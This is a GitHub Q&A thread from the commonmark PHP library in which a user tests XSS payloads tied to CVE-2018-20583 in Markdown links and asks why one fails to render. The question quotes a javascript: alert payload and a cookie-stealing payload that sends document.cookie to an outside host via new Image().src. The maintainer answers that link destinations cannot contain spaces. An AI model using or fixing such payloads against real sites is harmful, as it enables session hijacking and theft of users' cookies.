### DISCUSSION TITLE
Why do links with spaces not work?

### DISCUSSION THREAD

**Discussion by lqgithu** [thephpleague/commonmark#639] [Q&A] [answered]
Regarding CVE-2018-20583, 
I try command: "[Click me](java
scri%0Apt:alert('XSS'))", it generate "clickme", when i click, it pops up window and works fine.
but when  i try below command, it didn't generate hyperlink "clickme: , why? thanks
"[Click me](javascri%0Apt: new Image ().src="http://test.com:2222/"+document.cookie)"

**Comment by colinodell** [comment, marked as answer]
Per the CommonMark spec, link destinations cannot contain spaces: https://spec.commonmark.org/0.28/#example-463 Your input contains 2 spaces and therefore does not match the definition of a valid link destination.
